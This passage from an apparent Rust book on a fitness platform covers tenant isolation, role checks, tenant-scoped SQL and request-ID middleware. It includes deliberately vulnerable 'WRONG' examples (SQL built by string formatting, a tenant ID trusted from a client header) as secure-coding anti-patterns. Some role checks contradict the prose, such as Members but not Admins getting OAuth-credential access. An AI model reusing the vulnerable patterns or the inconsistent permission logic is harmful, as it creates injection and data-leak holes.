Key principle: Every database query includes WHERE tenant_id = <current_tenant_id> to enforce row-level security. No query can access data from a different tenant, even if the application code has a bug.
Tenant Context Structure
The TenantContext struct carries tenant information throughout the request lifecycle:
Source: src/tenant/mod.rs:29-70
#![allow(unused)]
fn main() {
/// Tenant context for all operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantContext {
/// Tenant ID
pub tenant_id: Uuid,
/// Tenant name for display
pub tenant_name: String,
/// User ID within tenant context
pub user_id: Uuid,
/// User's role within the tenant
pub user_role: TenantRole,
}
impl TenantContext {
/// Create new tenant context
#[must_use]
pub const fn new(
tenant_id: Uuid,
tenant_name: String,
user_id: Uuid,
user_role: TenantRole,
) -> Self {
Self {
tenant_id,
tenant_name,
user_id,
user_role,
}
}
/// Check if user has admin privileges in this tenant
#[must_use]
pub const fn is_admin(&self) -> bool {
matches!(self.user_role, TenantRole::Admin | TenantRole::Owner)
}
/// Check if user can configure OAuth apps
#[must_use]
pub const fn can_configure_oauth(&self) -> bool {
matches!(self.user_role, TenantRole::Admin | TenantRole::Owner)
}
}
}
Rust Idiom: #[derive(Clone, Serialize, Deserialize)]
The Clone derive enables passing TenantContext across async boundaries. The struct is small (4 fields, all cheap to clone) and frequently needed by multiple handlers. Cloning is more ergonomic than managing lifetimes for a shared reference.
The Serialize and Deserialize derives allow embedding TenantContext in JSON responses and session data.
Tenant Roles and Permissions
The platform defines four tenant roles with increasing privileges:
Source: src/tenant/schema.rs:11-54
#![allow(unused)]
fn main() {
/// Tenant role within an organization
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
pub enum TenantRole {
/// Organization owner (full permissions)
Owner,
/// Administrator (can configure OAuth, manage users)
Admin,
/// Billing manager (can view usage, manage billing)
Billing,
/// Regular member (can use tools)
Member,
}
impl TenantRole {
/// Convert from database string
#[must_use]
pub fn from_db_string(s: &str) -> Self {
match s {
"owner" => Self::Owner,
"admin" => Self::Admin,
"billing" => Self::Billing,
"member" => Self::Member,
_ => {
// Log unknown role but fallback to member for security
tracing::warn!(
"Unknown tenant role '{}' encountered, defaulting to Member",
s
);
Self::Member
}
}
}
/// Convert to database string
#[must_use]
pub const fn to_db_string(&self) -> &'static str {
match self {
Self::Owner => "owner",
Self::Admin => "admin",
Self::Billing => "billing",
Self::Member => "member",
}
}
}
}
Permission hierarchy:
- Owner: Full control, can modify tenant settings, delete tenant, manage all users
- Admin: Configure OAuth apps, manage users, access all tools
- Billing: View usage metrics, manage subscription and billing
- Member: Use tools and access their own data (no administrative functions)
Rust Idiom: Default to least privilege
The from_db_string method defaults to Member for unknown roles. This “fail-safe” approach ensures that database corruption or future role additions don’t accidentally grant excessive permissions. Always default to the most restrictive option when parsing untrusted data.
JWT Claims and Tenant Extraction
User authentication tokens (Chapter 6) include an optional tenant_id claim for multi-tenant deployment:
Source: src/auth.rs:108-130
#![allow(unused)]
fn main() {
/// JWT claims for user authentication
#[derive(Debug, Serialize, Deserialize)]
pub struct Claims {
pub sub: String, // User ID
pub email: String,
pub iat: i64,
pub exp: i64,
pub iss: String,
pub jti: String,
pub providers: Vec<String>,
pub aud: String,
/// Tenant ID (optional for backward compatibility with existing tokens)
#[serde(skip_serializing_if = "Option::is_none")]
pub tenant_id: Option<String>,
}
}
The platform extracts tenant context from JWT tokens during request authentication:
Source: src/mcp/tenant_isolation.rs:30-58
#![allow(unused)]
fn main() {
/// Validate JWT token and extract tenant context
///
/// # Errors
/// Returns an error if JWT validation fails or tenant information cannot be retrieved
pub async fn validate_tenant_access(&self, jwt_token: &str) -> Result<TenantContext> {
let auth_result = self
.resources
.auth_manager
.validate_token(jwt_token, &self.resources.jwks_manager)?;
// Parse user ID from claims
let user_id = crate::utils::uuid::parse_uuid(&auth_result.sub)
.map_err(|e| {
tracing::warn!(sub = %auth_result.sub, error = %e, "Invalid user ID in JWT token claims");
AppError::auth_invalid("Invalid user ID in token")
})?;
let user = self.get_user_with_tenant(user_id).await?;
let tenant_id = self.extract_tenant_id(&user)?;
let tenant_name = self.get_tenant_name(tenant_id).await;
let user_role = self.get_user_role_for_tenant(user_id, tenant_id).await?;
Ok(TenantContext {
tenant_id,
tenant_name,
user_id,
user_role,
})
}
}
Flow:
- Validate JWT signature and expiration (Chapter 6)
- Extract
user_idfromsubclaim - Look up user in database to find their
tenant_id - Query tenant table for
tenant_name - Look up user’s role within the tenant (Owner/Admin/Billing/Member)
- Construct
TenantContextfor the request
Extracting Tenant_id from User Record
Users belong to exactly one tenant (single-tenancy per user):
Source: src/mcp/tenant_isolation.rs:73-88
#![allow(unused)]
fn main() {
/// Extract tenant ID from user
///
/// # Errors
/// Returns an error if tenant ID is missing or invalid
pub fn extract_tenant_id(&self, user: &crate::models::User) -> Result<Uuid> {
user.tenant_id
.clone() // Safe: Option<String> ownership for UUID parsing
.ok_or_else(|| -> anyhow::Error {
AppError::auth_invalid("User does not belong to any tenant").into()
})?
.parse()
.map_err(|e| -> anyhow::Error {
tracing::warn!(user_id = %user.id, tenant_id = ?user.tenant_id, error = %e, "Invalid tenant ID format for user");
AppError::invalid_input("Invalid tenant ID format").into()
})
}
}
Note: The tenant_id is stored as a string to support both formats:
- UUID-based:
"550e8400-e29b-41d4-a716-446655440000" - Slug-based:
"acme-corp"for vanity URLs
The platform attempts UUID parsing first, then falls back to slug lookup.
Database Isolation with where Clauses
Every database query that accesses tenant-scoped data includes a WHERE tenant_id = ? clause:
OAuth Credentials Isolation
Tenant OAuth credentials are stored separately from user credentials:
Source: src/database_plugins/sqlite.rs:1297-1302
SELECT tenant_id, provider, client_id, client_secret_encrypted, redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_credentials
WHERE tenant_id = ?1 AND provider = ?2 AND is_active = true
Source: src/database_plugins/postgres.rs:3151-3156
SELECT client_id, client_secret_encrypted, client_secret_nonce,
redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_apps
WHERE tenant_id = $1 AND provider = $2 AND is_active = true
Security: The WHERE tenant_id = ? clause ensures that even if application code passes the wrong tenant ID, the database returns no results. This “defense in depth” prevents cross-tenant data leaks from programming errors.
Listing Tenant OAuth Apps
Source: src/database_plugins/sqlite.rs:1249-1254
SELECT tenant_id, provider, client_id, client_secret_encrypted, redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_credentials
WHERE tenant_id = ?1 AND is_active = true
ORDER BY provider
Source: src/database_plugins/postgres.rs:3077-3082
SELECT provider, client_id, client_secret_encrypted, client_secret_nonce,
redirect_uri, scopes, rate_limit_per_day
FROM tenant_oauth_apps
WHERE tenant_id = $1 AND is_active = true
ORDER BY provider
Pattern: All tenant-scoped queries follow this structure:
- SELECT only needed columns
- FROM tenant-scoped table
- WHERE tenant_id = $param AND is_active = true
- ORDER BY for deterministic results
Tenant Isolation Manager
The TenantIsolation manager coordinates tenant context extraction and validation:
Source: src/mcp/tenant_isolation.rs:18-28
#![allow(unused)]
fn main() {
/// Manages tenant isolation and multi-tenancy for the MCP server
pub struct TenantIsolation {
resources: Arc<ServerResources>,
}
impl TenantIsolation {
/// Create a new tenant isolation manager
#[must_use]
pub const fn new(resources: Arc<ServerResources>) -> Self {
Self { resources }
}
}
Dependency: The manager holds Arc<ServerResources> to access:
auth_manager: JWT validationjwks_manager: RS256 key lookupdatabase: User and tenant queries
Rust Idiom: const fn new()
The const qualifier allows creating TenantIsolation at compile time if all dependencies support it. In practice, Arc<ServerResources> isn’t const-constructible, but the pattern future-proofs the API.
Role-Based Access Control
The platform validates user permissions for specific actions:
Source: src/mcp/tenant_isolation.rs:238-276
#![allow(unused)]
fn main() {
/// Validate that a user can perform an action on behalf of a tenant
///
/// # Errors
/// Returns an error if validation fails
pub async fn validate_tenant_action(
&self,
user_id: Uuid,
tenant_id: Uuid,
action: &str,
) -> Result<()> {
let user_role = self.get_user_role_for_tenant(user_id, tenant_id).await?;
match action {
"read_oauth_credentials" | "store_oauth_credentials" => {
if matches!(user_role, TenantRole::Owner | TenantRole::Member) {
Ok(())
} else {
Err(AppError::auth_invalid(format!(
"User {user_id} does not have permission to {action} for tenant {tenant_id}"
))
.into())
}
}
"modify_tenant_settings" => {
if matches!(user_role, TenantRole::Owner) {
Ok(())
} else {
Err(AppError::auth_invalid(format!(
"User {user_id} does not have owner permission for tenant {tenant_id}"
))
.into())
}
}
_ => {
warn!("Unknown action for validation: {}", action);
Err(AppError::invalid_input(format!("Unknown action: {action}")).into())
}
}
}
}
Pattern: Explicit action strings with role matching. The platform could use a more elaborate permission system (e.g., Permission enum with bitflags), but string matching provides flexibility for runtime-defined permissions.
Rust Idiom: matches!() macro
The matches!(user_role, TenantRole::Owner | TenantRole::Member) macro provides concise pattern matching for simple checks. It’s more readable than:
#![allow(unused)]
fn main() {
user_role == TenantRole::Owner || user_role == TenantRole::Member
}
Resource Access Validation
The platform validates access to specific resource types:
Source: src/mcp/tenant_isolation.rs:201-224
#![allow(unused)]
fn main() {
/// Check if user has access to a specific resource
///
/// # Errors
/// Returns an error if role lookup fails
pub async fn check_resource_access(
&self,
user_id: Uuid,
tenant_id: Uuid,
resource_type: &str,
) -> Result<bool> {
// Verify user belongs to the tenant
let user_role = self.get_user_role_for_tenant(user_id, tenant_id).await?;
// Basic access control - can be extended based on requirements
match resource_type {
"oauth_credentials" => Ok(matches!(user_role, TenantRole::Owner | TenantRole::Member)),
"fitness_data" => Ok(matches!(user_role, TenantRole::Owner | TenantRole::Member)),
"tenant_settings" => Ok(matches!(user_role, TenantRole::Owner)),
_ => {
warn!("Unknown resource type: {}", resource_type);
Ok(false)
}
}
}
}
Security: Unknown resource types return false (deny by default). This ensures that new resources added to the platform require explicit permission configuration.
Tenant Resources Wrapper
The TenantResources struct provides tenant-scoped access to database operations:
Source: src/mcp/tenant_isolation.rs:279-360
#![allow(unused)]
fn main() {
/// Tenant-scoped resource accessor
pub struct TenantResources {
/// Unique identifier for the tenant
pub tenant_id: Uuid,
/// Database connection for tenant-scoped operations
pub database: Arc<Database>,
}
impl TenantResources {
/// Get OAuth credentials for this tenant
///
/// # Errors
/// Returns an error if credential lookup fails
pub async fn get_oauth_credentials(
&self,
provider: &str,
) -> Result<Option<crate::tenant::oauth_manager::TenantOAuthCredentials>> {
self.database
.get_tenant_oauth_credentials(self.tenant_id, provider)
.await
}
/// Store OAuth credentials for this tenant
///
/// # Errors
/// Returns an error if credential storage fails or tenant ID mismatch
pub async fn store_oauth_credentials(
&self,
credential: &crate::tenant::oauth_manager::TenantOAuthCredentials,
) -> Result<()> {
// Ensure the credential belongs to this tenant
if credential.tenant_id != self.tenant_id {
return Err(AppError::invalid_input(format!(
"Credential tenant ID mismatch: expected {}, got {}",
self.tenant_id, credential.tenant_id
))
.into());
}
self.database
.store_tenant_oauth_credentials(credential)
.await
}
/// Get user OAuth tokens for this tenant
///
/// # Errors
/// Returns an error if token lookup fails
pub async fn get_user_oauth_tokens(
&self,
user_id: Uuid,
provider: &str,
) -> Result<Option<crate::models::UserOAuthToken>> {
// Convert tenant_id to string for database query
let tenant_id_str = self.tenant_id.to_string();
self.database
.get_user_oauth_token(user_id, &tenant_id_str, provider)
.await
}
/// Store user OAuth token for this tenant
///
/// # Errors
/// Returns an error if token storage fails
pub async fn store_user_oauth_token(
&self,
token: &crate::models::UserOAuthToken,
) -> Result<()> {
// Additional validation could be added here to ensure
// the user belongs to this tenant
// For now, store using the user's OAuth app approach
self.database
.store_user_oauth_app(
token.user_id,
&token.provider,
"", // client_id not available in UserOAuthToken
"", // client_secret not available in UserOAuthToken
"", // redirect_uri not available in UserOAuthToken
)
.await
}
}
}
Design pattern: Type-state pattern for tenant isolation. The TenantResources struct “knows” its tenant_id and automatically includes it in all database queries. This prevents forgetting to filter by tenant.
Rust Idiom: Validation at storage time
The store_oauth_credentials method validates that credential.tenant_id == self.tenant_id before storing. This prevents accidentally storing credentials for the wrong tenant, which would leak sensitive data.
Tenant-Aware Logging
The platform provides structured logging utilities that include tenant context:
Source: src/logging/tenant.rs:30-51
#![allow(unused)]
fn main() {
/// Tenant-aware logging utilities
pub struct TenantLogger;
impl TenantLogger {
/// Log MCP tool call with tenant context
pub fn log_mcp_tool_call(
user_id: Uuid,
tenant_id: Uuid,
tool_name: &str,
success: bool,
duration_ms: u64,
) {
tracing::info!(
user_id = %user_id,
tenant_id = %tenant_id,
tool_name = %tool_name,
success = %success,
duration_ms = %duration_ms,
event_type = "mcp_tool_call",
"MCP tool call completed"
);
}
}
Observability: Including tenant_id in all log entries enables:
- Per-tenant usage analytics
- Security audit trails (which tenant accessed what data)
- Performance debugging (is one tenant causing slow queries?)
- Billing and chargeback (which tenant consumed how many resources)
Authentication Logging
Source: src/logging/tenant.rs:54-81
#![allow(unused)]
fn main() {
/// Log authentication event with tenant context
pub fn log_auth_event(
user_id: Option<Uuid>,
tenant_id: Option<Uuid>,
auth_method: &str,
success: bool,
error_details: Option<&str>,
) {
if success {
tracing::info!(
user_id = ?user_id,
tenant_id = ?tenant_id,
auth_method = %auth_method,
success = %success,
event_type = "authentication",
"Authentication successful"
);
} else {
tracing::warn!(
user_id = ?user_id,
tenant_id = ?tenant_id,
auth_method = %auth_method,
success = %success,
error_details = ?error_details,
event_type = "authentication",
"Authentication failed"
);
}
}
}
Security: Failed authentication attempts include tenant_id (if available) to detect:
- Brute force attacks against a specific tenant
- Cross-tenant authentication attempts (attacker trying tenant A credentials against tenant B)
- Compromised user accounts
HTTP Request Logging
Source: src/logging/tenant.rs:84-115
#![allow(unused)]
fn main() {
/// Log HTTP request with tenant context
pub fn log_http_request(
user_id: Option<Uuid>,
tenant_id: Option<Uuid>,
method: &str,
path: &str,
status_code: u16,
duration_ms: u64,
) {
if status_code < crate::constants::network_config::HTTP_CLIENT_ERROR_THRESHOLD {
tracing::info!(
user_id = ?user_id,
tenant_id = ?tenant_id,
http_method = %method,
http_path = %path,
http_status = %status_code,
duration_ms = %duration_ms,
event_type = "http_request",
"HTTP request completed"
);
} else {
tracing::warn!(
user_id = ?user_id,
tenant_id = ?tenant_id,
http_method = %method,
http_path = %path,
http_status = %status_code,
duration_ms = %duration_ms,
event_type = "http_request",
"HTTP request failed"
);
}
}
}
Rust Idiom: Option<Uuid> for optional context
Not all requests have tenant context (e.g., health check endpoints, public landing pages). Using Option<Uuid> allows logging these requests with None values, which serialize as null in structured logs.
Database Operation Logging
Source: src/logging/tenant.rs:118-138
#![allow(unused)]
fn main() {
/// Log database operation with tenant context
pub fn log_database_operation(
user_id: Option<Uuid>,
tenant_id: Option<Uuid>,
operation: &str,
table: &str,
success: bool,
duration_ms: u64,
rows_affected: Option<usize>,
) {
tracing::debug!(
user_id = ?user_id,
tenant_id = ?tenant_id,
db_operation = %operation,
db_table = %table,
success = %success,
duration_ms = %duration_ms,
rows_affected = ?rows_affected,
event_type = "database_operation",
"Database operation completed"
);
}
}
Performance: Database logs use tracing::debug!() level to avoid overwhelming production systems. Enable in development with RUST_LOG=debug to troubleshoot slow queries.
Tenant Provider Isolation
Fitness provider requests use tenant-specific OAuth credentials:
Source: src/providers/tenant_provider.rs:15-47
#![allow(unused)]
fn main() {
/// Tenant-aware fitness provider that wraps existing providers with tenant context
#[async_trait]
pub trait TenantFitnessProvider: Send + Sync {
/// Authenticate using tenant-specific OAuth credentials
async fn authenticate_tenant(
&mut self,
tenant_context: &TenantContext,
provider: &str,
database: &dyn DatabaseProvider,
) -> Result<()>;
/// Get athlete information for the authenticated tenant user
async fn get_athlete(&self) -> Result<Athlete>;
/// Get activities for the authenticated tenant user
async fn get_activities(
&self,
limit: Option<usize>,
offset: Option<usize>,
) -> Result<Vec<Activity>>;
/// Get specific activity by ID
async fn get_activity(&self, id: &str) -> Result<Activity>;
/// Get stats for the authenticated tenant user
async fn get_stats(&self) -> Result<Stats>;
/// Get personal records for the authenticated tenant user
async fn get_personal_records(&self) -> Result<Vec<PersonalRecord>>;
/// Get provider name
fn provider_name(&self) -> &'static str;
}
}
Architecture: The TenantFitnessProvider trait wraps existing provider implementations (Strava, Garmin) with tenant context. When a user requests Strava data, the platform:
- Extracts
TenantContextfrom JWT - Looks up tenant’s Strava OAuth credentials (client ID, client secret)
- Uses tenant-specific credentials to fetch data
- Returns results scoped to the user within the tenant
This allows multiple tenants to use the same Strava integration with different OAuth apps.
Tenant Provider Factory
Source: src/providers/tenant_provider.rs:49-80
#![allow(unused)]
fn main() {
/// Factory for creating tenant-aware fitness providers
pub struct TenantProviderFactory {
oauth_client: Arc<TenantOAuthClient>,
}
impl TenantProviderFactory {
/// Create new tenant provider factory
#[must_use]
pub const fn new(oauth_client: Arc<TenantOAuthClient>) -> Self {
Self { oauth_client }
}
/// Create tenant-aware provider for the specified type
///
/// # Errors
///
/// Returns an error if the provider type is not supported
pub fn create_tenant_provider(
&self,
provider_type: &str,
) -> Result<Box<dyn TenantFitnessProvider>> {
match provider_type.to_lowercase().as_str() {
"strava" => Ok(Box::new(super::strava_tenant::TenantStravaProvider::new(
self.oauth_client.clone(),
))),
_ => Err(AppError::invalid_input(format!(
"Unknown tenant provider: {provider_type}. Currently supported: strava"
))
.into()),
}
}
}
}
Extensibility: The factory pattern makes it easy to add new providers (Garmin, Fitbit, Polar) by implementing TenantFitnessProvider and adding a match arm.
Tenant Schema and Models
The database schema enforces tenant isolation with foreign key constraints:
Source: src/tenant/schema.rs:56-93
#![allow(unused)]
fn main() {
/// Tenant/Organization in the multi-tenant system
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Tenant {
/// Unique tenant identifier
pub id: Uuid,
/// Display name for the organization
pub name: String,
/// URL-safe identifier for tenant (e.g., "acme-corp")
pub slug: String,
/// Domain for custom tenant routing (optional)
pub domain: Option<String>,
/// Subscription tier
pub subscription_tier: String,
/// Whether tenant is active
pub is_active: bool,
/// When tenant was created
pub created_at: DateTime<Utc>,
/// When tenant was last updated
pub updated_at: DateTime<Utc>,
}
impl Tenant {
/// Create a new tenant
#[must_use]
pub fn new(name: String, slug: String) -> Self {
let now = Utc::now();
Self {
id: Uuid::new_v4(),
name,
slug,
domain: None,
subscription_tier: "starter".into(),
is_active: true,
created_at: now,
updated_at: now,
}
}
}
}
Fields:
id: Primary key (UUID)slug: URL-safe identifier for vanity URLs (acme-corp.pierre.app)domain: Custom domain for white-label deployments (fitness.acme.com)subscription_tier: For tiered pricing (starter, professional, enterprise)is_active: Soft delete (deactivate tenant without deleting data)
Tenant-User Relationship
Source: src/tenant/schema.rs:95-122
#![allow(unused)]
fn main() {
/// User membership in a tenant
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantUser {
/// Unique relationship identifier
pub id: Uuid,
/// Tenant ID
pub tenant_id: Uuid,
/// User ID
pub user_id: Uuid,
/// User's role in this tenant
pub role: TenantRole,
/// When user joined tenant
pub joined_at: DateTime<Utc>,
}
impl TenantUser {
/// Create new tenant-user relationship
#[must_use]
pub fn new(tenant_id: Uuid, user_id: Uuid, role: TenantRole) -> Self {
Self {
id: Uuid::new_v4(),
tenant_id,
user_id,
role,
joined_at: Utc::now(),
}
}
}
}
Design: The tenant_users junction table supports:
- Future multi-tenant users (one user, multiple tenants)
- Role changes over time (member promoted to admin)
- Audit trail (
joined_attimestamp)
Currently, users belong to exactly one tenant, but the schema allows future enhancement.
Tenant Usage Tracking
Source: src/tenant/schema.rs:124-143
#![allow(unused)]
fn main() {
/// Daily usage tracking per tenant per provider
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantProviderUsage {
/// Unique usage record identifier
pub id: Uuid,
/// Tenant ID
pub tenant_id: Uuid,
/// Provider name
pub provider: String,
/// Usage date
pub usage_date: chrono::NaiveDate,
/// Number of successful requests
pub request_count: u32,
/// Number of failed requests
pub error_count: u32,
/// When record was created
pub created_at: DateTime<Utc>,
/// When record was last updated
pub updated_at: DateTime<Utc>,
}
}
Purpose: Per-tenant provider usage enables:
- Rate limiting enforcement (prevent one tenant from exhausting API quotas)
- Billing and chargeback (charge tenants for Strava API usage)
- Analytics (which tenants use which providers most)
- Capacity planning (do we need higher Strava rate limits?)
Rust Idiom: chrono::NaiveDate for calendar dates
Using NaiveDate (date without time zone) for usage_date avoids time zone confusion. The platform aggregates usage per calendar day in UTC, regardless of the tenant’s time zone.
Security Patterns and Best Practices
Defense in Depth
The platform employs multiple layers of security:
- JWT validation: Verify token signature and expiration (Chapter 6)
- Tenant extraction: Look up user’s tenant from database
- Role validation: Check user’s role within tenant
- Query filtering: Include
WHERE tenant_id = ?in all queries - Response validation: Ensure returned data belongs to tenant
Principle: Even if one layer fails (e.g., application bug passes wrong tenant ID), the database filtering prevents cross-tenant leaks.
Preventing Common Vulnerabilities
SQL injection: All queries use parameterized statements (?1, $1) instead of string concatenation:
#![allow(unused)]
fn main() {
// CORRECT (parameterized)
sqlx::query("SELECT * FROM users WHERE tenant_id = ?1")
.bind(tenant_id)
.fetch_all(&pool)
.await?;
// WRONG (vulnerable to SQL injection)
let query = format!("SELECT * FROM users WHERE tenant_id = '{}'", tenant_id);
sqlx::query(&query).fetch_all(&pool).await?;
}
Insecure direct object references (IDOR): Always validate resource ownership:
#![allow(unused)]
fn main() {
// CORRECT
async fn get_activity(tenant_id: Uuid, user_id: Uuid, activity_id: &str) -> Result<Activity> {
let activity = database.get_activity(activity_id).await?;
// Verify activity belongs to this tenant
if activity.tenant_id != tenant_id {
return Err(AppError::not_found("Activity"));
}
Ok(activity)
}
}
Cross-tenant data leaks: Never trust client-provided tenant IDs. Always extract from authenticated user:
#![allow(unused)]
fn main() {
// CORRECT
let tenant_context = tenant_isolation.validate_tenant_access(&jwt_token).await?;
let activities = database.get_activities(tenant_context.tenant_id, user_id).await?;
// WRONG (client can forge tenant_id)
let tenant_id = request.headers.get("x-tenant-id")?;
let activities = database.get_activities(tenant_id, user_id).await?;
}
Key Takeaways
-
True multi-tenancy: Multiple organizations share infrastructure with complete data isolation. Every database query filters by
tenant_id. -
TenantContext lifecycle: Extract tenant from JWT → Look up user’s tenant_id → Validate role → Pass context to handlers.
-
Role-based access control: Four roles (Owner, Admin, Billing, Member) with explicit permission checks for sensitive operations.
-
Database-level isolation:
WHERE tenant_id = ?clauses in all queries provide defense in depth against application bugs. -
Tenant-scoped resources:
TenantResourceswrapper automatically includes tenant_id in all operations. -
OAuth credential isolation: Each tenant configures their own Strava/Garmin OAuth apps. No sharing of API credentials.
-
Structured logging: All log entries include
tenant_idfor security audits, billing, and performance analysis. -
Type-state pattern: Rust’s type system prevents passing wrong tenant IDs by encapsulating tenant_id in
TenantResources. -
Fail-safe defaults: Unknown roles default to
Member(least privilege). Unknown resource types deny access. -
Usage tracking: Per-tenant provider usage enables rate limiting, billing, and capacity planning.
Next Chapter: Chapter 08: Middleware & Request Context - Learn how the Pierre platform uses Axum middleware to extract authentication, tenant context, and rate limiting information from HTTP requests before routing to handlers.
Chapter 08: Middleware & Request Context
This chapter explores how the Pierre Fitness Platform uses Axum middleware to extract authentication, tenant context, rate limiting information, and tracing data from HTTP requests before routing to handlers. You’ll learn about middleware composition, request ID generation, CORS configuration, and PII-safe logging.
Middleware Stack Overview
The Pierre platform uses a layered middleware stack that processes every HTTP request before it reaches handlers:
┌────────────────────────────────────────────────────────────┐
│ HTTP Request │
└───────────────────────┬────────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ CORS Middleware │ ← Allow cross-origin requests
│ (OPTIONS preflight) │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Request ID Middleware │ ← Generate UUID for tracing
│ x-request-id: ... │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tracing Middleware │ ← Create span with metadata
│ RequestContext │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Auth Middleware │ ← Validate JWT/API key
│ Extract user_id │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tenant Middleware │ ← Extract tenant context
│ TenantContext │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Rate Limit Middleware │ ← Check usage limits
│ Add X-RateLimit-* │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Route Handler │ ← Business logic
│ Process request │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Response │ ← Add security headers
│ x-request-id: ... │
└──────────────────────────┘
Source: src/middleware/mod.rs:1-77
#![allow(unused)]
fn main() {
// ABOUTME: HTTP middleware for request tracing, authentication, and context propagation
// ABOUTME: Provides request ID generation, span creation, and tenant context for structured logging
/// Authentication middleware for MCP and API requests
pub mod auth;
/// CORS middleware configuration
pub mod cors;
/// Rate limiting middleware and utilities
pub mod rate_limiting;
/// PII redaction and sensitive data masking
pub mod redaction;
/// Request ID generation and propagation
pub mod request_id;
/// Request tracing and context propagation
pub mod tracing;
// Authentication middleware
/// MCP authentication middleware
pub use auth::McpAuthMiddleware;
// CORS middleware
/// Setup CORS layer for HTTP endpoints
pub use cors::setup_cors;
// Rate limiting middleware and utilities
/// Check rate limit and send error response
pub use rate_limiting::check_rate_limit_and_respond;
/// Create rate limit error
pub use rate_limiting::create_rate_limit_error;
/// Create rate limit headers
pub use rate_limiting::create_rate_limit_headers;
/// Rate limit headers module
pub use rate_limiting::headers;
// PII-safe logging and redaction
/// Mask email addresses for logging
pub use redaction::mask_email;
/// Redact sensitive HTTP headers
pub use redaction::redact_headers;
/// Redact JSON fields by pattern
pub use redaction::redact_json_fields;
/// Redact token patterns from strings
pub use redaction::redact_token_patterns;
/// Bounded tenant label for tracing
pub use redaction::BoundedTenantLabel;
/// Bounded user label for tracing
pub use redaction::BoundedUserLabel;
/// Redaction configuration
pub use redaction::RedactionConfig;
/// Redaction features toggle
pub use redaction::RedactionFeatures;
// Request ID middleware
/// Request ID middleware function
pub use request_id::request_id_middleware;
/// Request ID extractor
pub use request_id::RequestId;
// Request tracing and context management
/// Create database operation span
pub use tracing::create_database_span;
/// Create MCP operation span
pub use tracing::create_mcp_span;
/// Create HTTP request span
pub use tracing::create_request_span;
/// Request context for tracing
pub use tracing::RequestContext;
}
Rust Idiom: Re-exporting with pub use
The middleware/mod.rs file acts as a facade, re-exporting commonly used types from submodules. This allows handlers to use crate::middleware::RequestId instead of use crate::middleware::request_id::RequestId, reducing coupling to internal module organization.
Request ID Generation
Every HTTP request receives a unique identifier for distributed tracing and log correlation:
Source: src/middleware/request_id.rs:39-61
#![allow(unused)]
fn main() {
/// Request ID middleware that generates and propagates correlation IDs
///
/// This middleware:
/// 1. Generates a unique UUID v4 for each request
/// 2. Adds the request ID to request extensions for handler access
/// 3. Records the request ID in the current tracing span
/// 4. Includes the request ID in the response header
pub async fn request_id_middleware(mut req: Request, next: Next) -> Response {
// Generate unique request ID
let request_id = Uuid::new_v4().to_string();
// Record request ID in current tracing span
let span = Span::current();
span.record("request_id", &request_id);
// Add to request extensions for handler access
req.extensions_mut().insert(RequestId(request_id.clone()));
// Process request
let mut response = next.run(req).await;
// Add request ID to response header
if let Ok(header_value) = HeaderValue::from_str(&request_id) {
response
.headers_mut()
.insert(REQUEST_ID_HEADER, header_value);
}
response
}
}
Flow:
- Generate: Create UUID v4 for globally unique ID
- Record: Add to current tracing span for structured logs
- Extend: Store in request extensions for handler access
- Process: Call next middleware/handler with
next.run(req) - Respond: Include
x-request-idheader in response
Rust Idiom: Request extensions for typed data
Axum’s req.extensions_mut().insert(RequestId(...)) provides type-safe request-scoped storage. Handlers can extract RequestId using:
#![allow(unused)]
fn main() {
async fn handler(Extension(request_id): Extension<RequestId>) -> String {
format!("Request ID: {}", request_id.0)
}
}
The type system ensures you can’t accidentally insert or extract the wrong type.
Requestid Extractor
Source: src/middleware/request_id.rs:75-90
#![allow(unused)]
fn main() {
/// Request ID extractor for use in handlers
///
/// This can be extracted in any Axum handler to access the request ID
/// generated by the middleware.
#[derive(Debug, Clone)]
pub struct RequestId(pub String);
impl RequestId {
/// Get the request ID as a string slice
#[must_use]
pub fn as_str(&self) -> &str {
&self.0
}
}
impl std::fmt::Display for RequestId {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", self.0)
}
}
}
Newtype pattern: Wrapping String in RequestId provides:
- Type safety: Can’t confuse request ID with other strings
- Display trait: Use
{request_id}in format strings - Documentation: Self-documenting API (function signature says “I need a RequestId”)
Request Context and Tracing
The RequestContext struct flows through the entire request lifecycle, accumulating metadata:
Source: src/middleware/tracing.rs:10-67
#![allow(unused)]
fn main() {
/// Request context that flows through the entire request lifecycle
#[derive(Debug, Clone)]
pub struct RequestContext {
/// Unique identifier for this request
pub request_id: String,
/// Authenticated user ID (if available)
pub user_id: Option<Uuid>,
/// Tenant ID for multi-tenancy (if available)
pub tenant_id: Option<Uuid>,
/// Authentication method used (e.g., "Bearer", "ApiKey")
pub auth_method: Option<String>,
}
impl RequestContext {
/// Create new request context with generated request ID
#[must_use]
pub fn new() -> Self {
Self {
request_id: format!("req_{}", Uuid::new_v4().simple()),
user_id: None,
tenant_id: None,
auth_method: None,
}
}
/// Update context with authentication information
#[must_use]
pub fn with_auth(mut self, user_id: Uuid, auth_method: String) -> Self {
self.user_id = Some(user_id);
self.tenant_id = Some(user_id); // For now, user_id serves as tenant_id
self.auth_method = Some(auth_method);
self
}
/// Record context in current tracing span
pub fn record_in_span(&self) {
let span = Span::current();
span.record("request_id", &self.request_id);
if let Some(user_id) = &self.user_id {
span.record("user_id", user_id.to_string());
}
if let Some(tenant_id) = &self.tenant_id {
span.record("tenant_id", tenant_id.to_string());
}
if let Some(auth_method) = &self.auth_method {
span.record("auth_method", auth_method);
}
}
}
}
Builder pattern: The with_auth method allows chaining:
#![allow(unused)]
fn main() {
let context = RequestContext::new()
.with_auth(user_id, "Bearer".into());
}
Span recording: The record_in_span method populates tracing fields declared as Empty:
#![allow(unused)]
fn main() {
